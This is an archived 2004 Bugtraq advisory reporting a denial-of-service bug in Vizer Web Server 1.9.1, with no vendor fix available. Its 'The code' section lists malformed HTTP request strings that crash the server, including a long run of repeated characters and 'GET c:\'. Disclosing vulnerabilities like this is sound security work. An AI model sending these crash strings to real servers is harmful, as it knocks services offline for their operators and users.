lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 17 Feb 2004 09:49:48 -0000
From: "Donato Ferrante" <fdonato@...istici.org>
To: <bugtraq@...urityfocus.com>
Subject: Denial Of Service in Vizer Web Server 1.9.1


                          Donato Ferrante


Application:  Vizer Web Server
              http://sourceforge.net/projects/vizerwebserver/

Version:      1.9.1

Bug:          Denial Of Service

Author:       Donato Ferrante
              e-mail: fdonato@...istici.org
              web:    www.autistici.org/fdonato


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

1. Description
2. The bug
3. The code
4. The fix



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

----------------
1. Description:
----------------

Vendor's Description:

"Vizer is an open source web server written in Visual Basic."



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
2. The bug:
-------------

The program doesn't well menage the input strings received, so an
attacker is able to crash the web server, sending a crafted string.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
3. The code:
-------------

To test the vulnerability, send to the web server a string like:

index.htm
( without specifying GET and HTTP )

or:

GET /aaaaaa[ 250 of a ]aaa HTTP/1.1
( specifying GET and HTTP )

GET /aaaaaa[ 250 of a ]aaa
( specifying only GET )

or:

GET c:\
( specifying only GET )



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
4. The fix:
------------

No fix.
The vendor has not answered to my signalations.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx




Powered by blists - more mailing lists